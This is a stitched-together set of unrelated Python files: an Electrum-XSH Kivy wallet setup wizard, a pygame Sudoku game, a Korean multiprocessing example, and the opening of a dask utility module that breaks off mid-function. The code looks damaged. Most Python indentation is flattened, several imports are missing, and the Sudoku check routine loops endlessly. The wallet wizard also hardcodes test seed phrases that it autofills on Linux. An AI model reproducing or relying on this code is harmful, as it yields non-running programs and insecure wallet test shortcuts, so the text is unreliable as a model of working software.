from kivy.properties import ObjectProperty, StringProperty, OptionProperty
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.utils import platform
from kivy.uix.widget import Widget
from kivy.core.window import Window
from kivy.clock import Clock
from kivy.utils import platform
from electrum_xsh.base_wizard import BaseWizard
from electrum_xsh.util import is_valid_email
from . import EventsDialog
from ...i18n import _
from .password_dialog import PasswordDialog
# global Variables
is_test = (platform == "linux")
test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve"
test_seed = "grape impose jazz bind spatial mind jelly tourist tank today holiday stomach"
test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL"
Builder.load_string('''
#:import Window kivy.core.window.Window
#:import _ electrum_xsh_gui.kivy.i18n._
<WizardTextInput@TextInput>
border: 4, 4, 4, 4
font_size: '15sp'
padding: '15dp', '15dp'
background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1)
foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1)
hint_text_color: self.foreground_color
background_active: 'atlas://gui/kivy/theming/light/create_act_text_active'
background_normal: 'atlas://gui/kivy/theming/light/create_act_text_active'
size_hint_y: None
height: '48sp'
<WizardButton@Button>:
root: None
size_hint: 1, None
height: '48sp'
on_press: if self.root: self.root.dispatch('on_press', self)
on_release: if self.root: self.root.dispatch('on_release', self)
<BigLabel@Label>
color: .854, .925, .984, 1
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
bold: True
<-WizardDialog>
text_color: .854, .925, .984, 1
value: ''
#auto_dismiss: False
size_hint: None, None
canvas.before:
Color:
rgba: .239, .588, .882, 1
Rectangle:
size: Window.size
crcontent: crcontent
# add electrum icon
BoxLayout:
orientation: 'vertical' if self.width < self.height else 'horizontal'
padding:
min(dp(27), self.width/32), min(dp(27), self.height/32),\
min(dp(27), self.width/32), min(dp(27), self.height/32)
spacing: '10dp'
GridLayout:
id: grid_logo
cols: 1
pos_hint: {'center_y': .5}
size_hint: 1, None
height: self.minimum_height
Label:
color: root.text_color
text: 'ELECTRUM'
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'gui/kivy/data/fonts/tron/Tr2n.ttf'
GridLayout:
cols: 1
id: crcontent
spacing: '1dp'
Widget:
size_hint: 1, 0.3
GridLayout:
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
id: back
text: _('Back')
root: root
WizardButton:
id: next
text: _('Next')
root: root
disabled: root.value == ''
<WizardMultisigDialog>
value: 'next'
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: _("Choose the number of signatures needed to unlock funds in your wallet")
Widget
size_hint: 1, 1
GridLayout:
orientation: 'vertical'
cols: 2
spacing: '14dp'
size_hint: 1, 1
height: self.minimum_height
Label:
color: root.text_color
text: _('From {} cosigners').format(n.value)
Slider:
id: n
range: 2, 5
step: 1
value: 2
Label:
color: root.text_color
text: _('Require {} signatures').format(m.value)
Slider:
id: m
range: 1, n.value
step: 1
value: 2
<WizardChoiceDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
<WizardConfirmDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
<WizardTOSDialog>
message : ''
size_hint: 1, 1
ScrollView:
size_hint: 1, 1
TextInput:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.minimum_height
text: root.message
disabled: True
<WizardEmailDialog>
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: 'Please enter your email address'
WizardTextInput:
id: email
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<WizardKnownOTPDialog>
message : ''
message2: ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
Widget
size_hint: 1, 1
height: '48sp'
BoxLayout:
orientation: 'horizontal'
WizardButton:
id: cb
text: _('Request new secret')
on_release: root.request_new_secret()
size_hint: 1, None
WizardButton:
id: abort
text: _('Abort creation')
on_release: root.abort_wallet_creation()
size_hint: 1, None
<WizardNewOTPDialog>
message : ''
message2 : ''
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
QRCodeWidget:
id: qr
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<MButton@Button>:
size_hint: 1, None
height: '33dp'
on_release:
self.parent.update_amount(self.text)
<WordButton@Button>:
size_hint: None, None
padding: '5dp', '5dp'
text_size: None, self.height
width: self.texture_size[0]
height: '30dp'
on_release:
self.parent.new_word(self.text)
<SeedButton@Button>:
height: dp(100)
border: 4, 4, 4, 4
halign: 'justify'
valign: 'top'
font_size: '18dp'
text_size: self.width - dp(24), self.height - dp(12)
color: .1, .1, .1, 1
background_normal: 'atlas://gui/kivy/theming/light/white_bg_round_top'
background_down: self.background_normal
size_hint_y: None
<SeedLabel@Label>:
font_size: '12sp'
text_size: self.width, None
size_hint: 1, None
height: self.texture_size[1]
halign: 'justify'
valign: 'middle'
border: 4, 4, 4, 4
<RestoreSeedDialog>
message: ''
word: ''
BigLabel:
text: "ENTER YOUR SEED PHRASE"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input_seed
text: ''
on_text: Clock.schedule_once(root.on_text)
on_release: root.options_dialog()
SeedLabel:
text: root.message
BoxLayout:
id: suggestions
height: '35dp'
size_hint: 1, None
new_word: root.on_word
BoxLayout:
id: line1
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
MButton:
text: 'Q'
MButton:
text: 'W'
MButton:
text: 'E'
MButton:
text: 'R'
MButton:
text: 'T'
MButton:
text: 'Y'
MButton:
text: 'U'
MButton:
text: 'I'
MButton:
text: 'O'
MButton:
text: 'P'
BoxLayout:
id: line2
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 0.5, None
height: '33dp'
MButton:
text: 'A'
MButton:
text: 'S'
MButton:
text: 'D'
MButton:
text: 'F'
MButton:
text: 'G'
MButton:
text: 'H'
MButton:
text: 'J'
MButton:
text: 'K'
MButton:
text: 'L'
Widget:
size_hint: 0.5, None
height: '33dp'
BoxLayout:
id: line3
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 1, None
MButton:
text: 'Z'
MButton:
text: 'X'
MButton:
text: 'C'
MButton:
text: 'V'
MButton:
text: 'B'
MButton:
text: 'N'
MButton:
text: 'M'
MButton:
text: ' '
MButton:
text: '<'
<AddXpubDialog>
title: ''
message: ''
BigLabel:
text: root.title
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: ''
on_text: Clock.schedule_once(root.check_text)
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
IconButton:
id: scan
height: '48sp'
on_release: root.scan_xpub()
icon: 'atlas://gui/kivy/theming/light/camera'
size_hint: 1, None
WizardButton:
text: _('Paste')
on_release: root.do_paste()
WizardButton:
text: _('Clear')
on_release: root.do_clear()
<ShowXpubDialog>
xpub: ''
message: _('Here is your master public key. Share it with your cosigners.')
BigLabel:
text: "MASTER PUBLIC KEY"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: root.xpub
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
text: _('QR code')
on_release: root.do_qr()
WizardButton:
text: _('Copy')
on_release: root.do_copy()
WizardButton:
text: _('Share')
on_release: root.do_share()
<ShowSeedDialog>
spacing: '12dp'
value: 'next'
BigLabel:
text: "PLEASE WRITE DOWN YOUR SEED PHRASE"
GridLayout:
id: grid
cols: 1
pos_hint: {'center_y': .5}
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing: '12dp'
SeedButton:
text: root.seed_text
on_release: root.options_dialog()
SeedLabel:
text: root.message
<LineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message
TextInput:
id: passphrase_input
multiline: False
size_hint: 1, None
height: '27dp'
SeedLabel:
text: root.warning
''')
class WizardDialog(EventsDialog):
''' Abstract dialog to be used as the base for all Create Account Dialogs
'''
crcontent = ObjectProperty(None)
def __init__(self, wizard, **kwargs):
super(WizardDialog, self).__init__()
self.wizard = wizard
self.ids.back.disabled = not wizard.can_go_back()
self.app = App.get_running_app()
self.run_next = kwargs['run_next']
_trigger_size_dialog = Clock.create_trigger(self._size_dialog)
Window.bind(size=_trigger_size_dialog,
rotation=_trigger_size_dialog)
_trigger_size_dialog()
self._on_release = False
def _size_dialog(self, dt):
app = App.get_running_app()
if app.ui_mode[0] == 'p':
self.size = Window.size
else:
#tablet
if app.orientation[0] == 'p':
#portrait
self.size = Window.size[0]/1.67, Window.size[1]/1.4
else:
self.size = Window.size[0]/2.5, Window.size[1]
def add_widget(self, widget, index=0):
if not self.crcontent:
super(WizardDialog, self).add_widget(widget)
else:
self.crcontent.add_widget(widget, index=index)
def on_dismiss(self):
app = App.get_running_app()
if app.wallet is None and not self._on_release:
app.stop()
def get_params(self, button):
return (None,)
def on_release(self, button):
self._on_release = True
self.close()
if not button:
self.parent.dispatch('on_wizard_complete', None)
return
if button is self.ids.back:
self.wizard.go_back()
return
params = self.get_params(button)
self.run_next(*params)
class WizardMultisigDialog(WizardDialog):
def get_params(self, button):
m = self.ids.m.value
n = self.ids.n.value
return m, n
class WizardOTPDialogBase(WizardDialog):
def get_otp(self):
otp = self.ids.otp.text
if len(otp) != 6:
return
try:
return int(otp)
except:
return
def on_text(self, dt):
self.ids.next.disabled = self.get_otp() is None
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardKnownOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
self.message = _("This wallet is already registered with TrustedCoin. To finalize wallet creation, please enter your Google Authenticator Code.")
self.message2 =_("If you have lost your Google Authenticator account, you can request a new secret. You will need to retype your seed.")
self.request_new = False
def get_params(self, button):
return (self.get_otp(), self.request_new)
def request_new_secret(self):
self.request_new = True
self.on_release(True)
def abort_wallet_creation(self):
self._on_release = True
os.unlink(self.wizard.storage.path)
self.wizard.terminate()
self.dismiss()
class WizardNewOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
otp_secret = kwargs['otp_secret']
uri = "otpauth://totp/%s?secret=%s"%('trustedcoin.com', otp_secret)
self.message = "Please scan the following QR code in Google Authenticator. You may also use the secret key: %s"%otp_secret
self.message2 = _('Then, enter your Google Authenticator code:')
self.ids.qr.set_data(uri)
def get_params(self, button):
return (self.get_otp(), False)
class WizardTOSDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.text = 'Accept'
self.ids.next.disabled = False
self.message = kwargs['tos']
self.message2 = _('Enter your email address:')
class WizardEmailDialog(WizardDialog):
def get_params(self, button):
return (self.ids.email.text,)
def on_text(self, dt):
self.ids.next.disabled = not is_valid_email(self.ids.email.text)
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardConfirmDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardConfirmDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
self.value = 'ok'
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (True,)
class WizardChoiceDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
choices = kwargs.get('choices', [])
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for action, text in choices:
l = WizardButton(text=text)
l.action = action
l.height = '48dp'
l.root = self
layout.add_widget(l)
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (button.action,)
class LineDialog(WizardDialog):
title = StringProperty('')
message = StringProperty('')
warning = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.disabled = False
def get_params(self, b):
return (self.ids.passphrase_input.text,)
class ShowSeedDialog(WizardDialog):
seed_text = StringProperty('')
message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
ext = False
def __init__(self, wizard, **kwargs):
super(ShowSeedDialog, self).__init__(wizard, **kwargs)
self.seed_text = kwargs['seed_text']
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(self.ids.back.dispatch, 'on_release')
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_params(self, b):
return (self.ext,)
class WordButton(Button):
pass
class WizardButton(Button):
pass
class RestoreSeedDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
self._test = kwargs['test']
from electrum_xsh.mnemonic import Mnemonic
from electrum_xsh.old_mnemonic import words as old_wordlist
self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
self.ids.text_input_seed.text = test_seed if is_test else ''
self.message = _('Please type your seed phrase using the virtual keyboard.')
self.title = _('Enter Seed')
self.ext = False
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_suggestions(self, prefix):
for w in self.words:
if w.startswith(prefix):
yield w
def on_text(self, dt):
self.ids.next.disabled = not bool(self._test(self.get_text()))
text = self.ids.text_input_seed.text
if not text:
last_word = ''
elif text[-1] == ' ':
last_word = ''
else:
last_word = text.split(' ')[-1]
enable_space = False
self.ids.suggestions.clear_widgets()
suggestions = [x for x in self.get_suggestions(last_word)]
if last_word in suggestions:
b = WordButton(text=last_word)
self.ids.suggestions.add_widget(b)
enable_space = True
for w in suggestions:
if w != last_word and len(suggestions) < 10:
b = WordButton(text=w)
self.ids.suggestions.add_widget(b)
i = len(last_word)
p = set()
for x in suggestions:
if len(x)>i: p.add(x[i])
for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
for c in line.children:
if isinstance(c, Button):
if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
c.disabled = (c.text.lower() not in p) and bool(last_word)
elif c.text == ' ':
c.disabled = not enable_space
def on_word(self, w):
text = self.get_text()
words = text.split(' ')
words[-1] = w
text = ' '.join(words)
self.ids.text_input_seed.text = text + ' '
self.ids.suggestions.clear_widgets()
def get_text(self):
ti = self.ids.text_input_seed
return ' '.join(ti.text.strip().split())
def update_text(self, c):
c = c.lower()
text = self.ids.text_input_seed.text
if c == '<':
text = text[:-1]
else:
text += c
self.ids.text_input_seed.text = text
def on_parent(self, instance, value):
if value:
tis = self.ids.text_input_seed
tis.focus = True
#tis._keyboard.bind(on_key_down=self.on_key_down)
self._back = _back = partial(self.ids.back.dispatch,
'on_release')
app = App.get_running_app()
def on_key_down(self, keyboard, keycode, key, modifiers):
if keycode[0] in (13, 271):
self.on_enter()
return True
def on_enter(self):
#self._remove_keyboard()
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
def _remove_keyboard(self):
tis = self.ids.text_input_seed
if tis._keyboard:
tis._keyboard.unbind(on_key_down=self.on_key_down)
tis.focus = False
def get_params(self, b):
return (self.get_text(), False, self.ext)
class ConfirmSeedDialog(RestoreSeedDialog):
def get_params(self, b):
return (self.get_text(),)
def options_dialog(self):
pass
class ShowXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.xpub = kwargs['xpub']
self.ids.next.disabled = False
def do_copy(self):
self.app._clipboard.copy(self.xpub)
def do_share(self):
self.app.do_share(self.xpub, _("Master Public Key"))
def do_qr(self):
from .qr_dialog import QRDialog
popup = QRDialog(_("Master Public Key"), self.xpub, True)
popup.open()
class AddXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.is_valid = kwargs['is_valid']
self.title = kwargs['title']
self.message = kwargs['message']
self.allow_multi = kwargs.get('allow_multi', False)
def check_text(self, dt):
self.ids.next.disabled = not bool(self.is_valid(self.get_text()))
def get_text(self):
ti = self.ids.text_input
return ti.text.strip()
def get_params(self, button):
return (self.get_text(),)
def scan_xpub(self):
def on_complete(text):
if self.allow_multi:
self.ids.text_input.text += text + '\n'
else:
self.ids.text_input.text = text
self.app.scan_qr(on_complete)
def do_paste(self):
self.ids.text_input.text = test_xpub if is_test else self.app._clipboard.paste()
def do_clear(self):
self.ids.text_input.text = ''
class InstallWizard(BaseWizard, Widget):
'''
events::
        `on_wizard_complete` Fired when the wizard is done creating or
        restoring the wallet(s).
'''
__events__ = ('on_wizard_complete', )
def on_wizard_complete(self, wallet):
"""overriden by main_window"""
pass
def waiting_dialog(self, task, msg, on_finished=None):
'''Perform a blocking task in the background by running the passed
method in a thread.
'''
def target():
# run your threaded function
try:
task()
except Exception as err:
self.show_error(str(err))
# on completion hide message
Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
if on_finished:
Clock.schedule_once(lambda dt: on_finished(), -1)
app = App.get_running_app()
app.show_info_bubble(
text=msg, icon='atlas://gui/kivy/theming/light/important',
pos=Window.center, width='200sp', arrow_pos=None, modal=True)
t = threading.Thread(target = target)
t.start()
def terminate(self, **kwargs):
self.dispatch('on_wizard_complete', self.wallet)
def choice_dialog(self, **kwargs):
choices = kwargs['choices']
if len(choices) > 1:
WizardChoiceDialog(self, **kwargs).open()
else:
f = kwargs['run_next']
f(choices[0][0])
def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open()
def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open()
def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open()
def confirm_seed_dialog(self, **kwargs):
kwargs['title'] = _('Confirm Seed')
kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it')
ConfirmSeedDialog(self, **kwargs).open()
def restore_seed_dialog(self, **kwargs):
RestoreSeedDialog(self, **kwargs).open()
def confirm_dialog(self, **kwargs):
WizardConfirmDialog(self, **kwargs).open()
def tos_dialog(self, **kwargs):
WizardTOSDialog(self, **kwargs).open()
def email_dialog(self, **kwargs):
WizardEmailDialog(self, **kwargs).open()
def otp_dialog(self, **kwargs):
if kwargs['otp_secret']:
WizardNewOTPDialog(self, **kwargs).open()
else:
WizardKnownOTPDialog(self, **kwargs).open()
def add_xpub_dialog(self, **kwargs):
kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
AddXpubDialog(self, **kwargs).open()
def add_cosigner_dialog(self, **kwargs):
kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
        kwargs['message'] = _("Please paste your cosigner's master public key, or scan it using the camera button.")
AddXpubDialog(self, **kwargs).open()
def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open()
def show_message(self, msg): self.show_error(msg)
def show_error(self, msg):
app = App.get_running_app()
Clock.schedule_once(lambda dt: app.show_error(msg))
def request_password(self, run_next, force_disable_encrypt_cb=False):
def on_success(old_pin, pin):
assert old_pin is None
run_next(pin, False)
def on_failure():
self.show_error(_('PIN mismatch'))
self.run('request_password', run_next)
popup = PasswordDialog()
app = App.get_running_app()
popup.init(app, None, _('Choose PIN code'), on_success, on_failure, is_change=2)
popup.open()
def action_dialog(self, action, run_next):
f = getattr(self, action)
f()
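# Illustrative usage sketch (not part of the original module): running a slow
# job through InstallWizard.waiting_dialog. `wizard` is assumed to be an
# already-constructed InstallWizard and `slow_task` is a made-up callable.
def _waiting_dialog_example(wizard, slow_task):
    wizard.waiting_dialog(slow_task, _("Please wait..."),
                          on_finished=lambda: wizard.show_message(_("Done")))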
|
Suduko.py
|
import pygame
from GameClock import GameClock
from SudukoPuzzleMaker import SudukoPuzzleMaker
import pygame as pg
import threading as t
# Init
pg.init()
pg.font.init()
clock = GameClock()
# Window
WIN_WIDTH, WIN_HEIGHT = 500, 500
window = pg.display.set_mode((WIN_WIDTH, WIN_HEIGHT), pg.RESIZABLE)
pg.display.set_caption("Suduko")
NUM_SIZE = 30
TIME_BOX_SIZE = 50
GAP_X = window.get_width()// 9
GAP_Y = (window.get_height() - TIME_BOX_SIZE)// 9
BOARD_SIZE = (GAP_X * 9, GAP_Y*9)
OFF_SET_X = GAP_X // 2
OFF_SET_Y = GAP_Y // 2
selectBox_x = 0
selectBox_y = 0
font = pg.font.SysFont('Calibri', NUM_SIZE)
# PuzzleMaker
maker = SudukoPuzzleMaker()
maker.makeBoard()
board = maker.getBoard()
permission = []
GameOn = True
running = True
# Functions
def permissions():
global permission, board
permission = [[0 for i in range(9)] for i in range(9)]
for i in range(9):
for j in range(9):
if (board[i][j] == 0):
permission[i][j] = True
else:
permission[i][j] = False
permissions()
def drawGrid():
for i in range(10):
# vertical line
if (i % 3 == 0):
pg.draw.line(window, (255, 255, 255), (GAP_X * i, 0),(GAP_X * i, BOARD_SIZE[1]), 3)
pg.draw.line(window, (255, 255, 255), (0, GAP_Y * i), (BOARD_SIZE[0], GAP_Y * i), 3)
else:
pg.draw.line(window, (255, 255, 255), (GAP_X * i, 0),(GAP_X * i, BOARD_SIZE[1]), 1)
pg.draw.line(window, (255, 255, 255), (0, GAP_Y * i), (BOARD_SIZE[0], GAP_Y * i), 1)
def drawNumber():
for i in range(9):
for j in range(9):
num = board[i][j]
color = (255, 255, 255)
if (num != 0):
if permission[i][j]:
color = (255,0,255)
text = font.render(str(num), True, color)
textRect = text.get_rect()
textRect.center = (GAP_X * i + OFF_SET_X, GAP_Y * j + OFF_SET_Y)
window.blit(text, textRect)
def textBox(text:str, x:int, y:int, font:pg.font.SysFont, color):
render_text = font.render(text, True, color)
render_text_box = render_text.get_rect()
render_text_box.center = (x, y)
window.blit(render_text, render_text_box)
pg.display.update()
def UpdateTime():
textBox(clock.getTimeElapsed(), 300, BOARD_SIZE[1] + OFF_SET_Y, font, (255, 255, 255))
def selectBox(pos):
global selectBox_x, selectBox_y
mouse_x = pos[0]
mouse_y = pos[1]
selectBox_x, selectBox_y = (mouse_x // GAP_X) %9, (mouse_y // GAP_Y)% 9
def highlight_box():
global selectBox_x, selectBox_y
x, y = selectBox_x, selectBox_y
pygame.draw.lines(window, (0,255,0), True,
[(GAP_X*x, GAP_Y*y), (GAP_X*x, GAP_Y*(y+1)),
(GAP_X*(x+1), GAP_Y*(y+1)), (GAP_X *(x+1), GAP_Y*(y))], 5)
def key_function():
global GameOn, running,selectBox_x, selectBox_y
keys = pg.key.get_pressed()
if permission[selectBox_x][selectBox_y]:
if keys[pg.K_1]:
board[selectBox_x][selectBox_y] = 1
if keys[pg.K_2]:
board[selectBox_x][selectBox_y] = 2
if keys[pg.K_3]:
board[selectBox_x][selectBox_y] = 3
if keys[pg.K_4]:
board[selectBox_x][selectBox_y] = 4
if keys[pg.K_5]:
board[selectBox_x][selectBox_y] = 5
if keys[pg.K_6]:
board[selectBox_x][selectBox_y] = 6
if keys[pg.K_7]:
board[selectBox_x][selectBox_y] = 7
if keys[pg.K_8]:
board[selectBox_x][selectBox_y] = 8
if keys[pg.K_9]:
board[selectBox_x][selectBox_y] = 9
if keys[pg.K_DELETE]:
board[selectBox_x][selectBox_y] = 0
if keys[pg.K_ESCAPE]:
GameOn = False
running = False
def repetition(arr):
    # True when the filled (non-zero) cells in arr are all distinct
    filled = [x for x in arr if x != 0]
    return len(filled) == len(set(filled))
def check():
    # intended to run in a background thread: flag rows/columns with duplicates
    while True:
        # check rows
        for i in range(9):
            if not repetition(board[i]):
                print("Check! row", i, "has a repeated number")
        # check columns
        for i in range(9):
            if not repetition([board[j][i] for j in range(9)]):
                print("Check! column", i, "has a repeated number")
def highlighting_box():
while True:
if (running):
highlight_box()
else:
break
selectionThread = t.Thread(target=highlighting_box)
selectionThread.start()
timeThread = t.Thread(target=clock.start)
timeThread.start()
while running:
for e in pg.event.get():
if e.type == pg.QUIT:
GameOn = False
running = False
if e.type == pg.VIDEORESIZE:
WIN_WIDTH, WIN_HEIGHT = window.get_width(), window.get_height()
NUM_SIZE = 30
TIME_BOX_SIZE = 50
GAP_X = window.get_width()// 9
GAP_Y = (window.get_height() - TIME_BOX_SIZE)// 9
BOARD_SIZE = (GAP_X * 9, GAP_Y*9)
OFF_SET_X = GAP_X // 2
OFF_SET_Y = GAP_Y // 2
if e.type == pg.MOUSEBUTTONDOWN:
selectBox(pg.mouse.get_pos())
if e.type == pg.KEYDOWN:
if e.key == pg.K_UP:
if (selectBox_y > 0): selectBox_y -= 1
if e.key == pg.K_DOWN:
if (selectBox_y < 8): selectBox_y += 1
if e.key == pg.K_RIGHT:
if (selectBox_x < 8) : selectBox_x += 1
if e.key == pg.K_LEFT:
if (selectBox_x > 0): selectBox_x -= 1
window.fill((0,0,0))
if GameOn:
drawGrid()
drawNumber()
key_function()
UpdateTime()
pg.display.flip()
pg.quit()
clock.stop()
|
basic_multiprocessing.py
|
"""
"멀티프로세싱"절 예시
`multiprocessing` 모듈을 이용해 새로운 프로세스들을
생성하는 방법을 설명한다.
"""
from multiprocessing import Process
import os
def work(identifier):
print(f'Hey, I am the process ' f'{identifier}, pid: {os.getpid()}')
def main():
processes = [Process(target=work, args=(number,)) for number in range(5)]
for process in processes:
process.start()
while processes:
processes.pop().join()
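# Hedged sketch (not part of the original example): the same fan-out can be
# written with multiprocessing.Pool, which creates and joins the worker
# processes for you. It reuses the `work` function defined above.
def pool_variant():
    from multiprocessing import Pool
    with Pool(processes=5) as pool:
        pool.map(work, range(5))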
if __name__ == "__main__":
main()
|
utils.py
|
from __future__ import annotations
import asyncio
import contextvars
import functools
import importlib
import inspect
import json
import logging
import multiprocessing
import os
import pkgutil
import re
import socket
import sys
import tempfile
import threading
import warnings
import weakref
import xml.etree.ElementTree
from asyncio import TimeoutError
from collections import OrderedDict, UserDict, deque
from collections.abc import Container, KeysView, ValuesView
from concurrent.futures import CancelledError, ThreadPoolExecutor # noqa: F401
from contextlib import contextmanager, suppress
from contextvars import ContextVar
from hashlib import md5
from importlib.util import cache_from_source
from time import sleep
from types import ModuleType
from typing import Any as AnyType
from typing import ClassVar
import click
import tblib.pickling_support
try:
import resource
except ImportError:
resource = None # type: ignore
import tlz as toolz
from tornado import gen
from tornado.ioloop import IOLoop
import dask
from dask import istask
from dask.utils import parse_timedelta as _parse_timedelta
from dask.widgets import get_template
from distributed.compatibility import WINDOWS
from distributed.metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
# For some reason this is required in python >= 3.9
if WINDOWS:
import multiprocessing.popen_spawn_win32
else:
import multiprocessing.popen_spawn_posix
logger = _logger = logging.getLogger(__name__)
no_default = "__no_default__"
def _initialize_mp_context():
method = dask.config.get("distributed.worker.multiprocessing-method")
ctx = multiprocessing.get_context(method)
if method == "forkserver":
# Makes the test suite much faster
preload = ["distributed"]
from distributed.versions import optional_packages, required_packages
for pkg, _ in required_packages + optional_packages:
try:
importlib.import_module(pkg)
except ImportError:
pass
else:
preload.append(pkg)
ctx.set_forkserver_preload(preload)
return ctx
mp_context = _initialize_mp_context()
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in inspect.getfullargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
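# Illustrative usage sketch (names `add` and `wrapped` are made up): has_arg
# follows functools.wraps-style __wrapped__ chains, so decorated callables
# are inspected through to the underlying function.
def _has_arg_example():
    def add(x, y):
        return x + y
    wrapped = functools.wraps(add)(lambda *a, **k: add(*a, **k))
    assert has_arg(add, "x")
    assert has_arg(wrapped, "y")
    assert not has_arg(add, "z")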
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@toolz.memoize
def _get_ip(host, port, family):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except OSError as e:
warnings.warn(
"Couldn't detect a suitable IP address for "
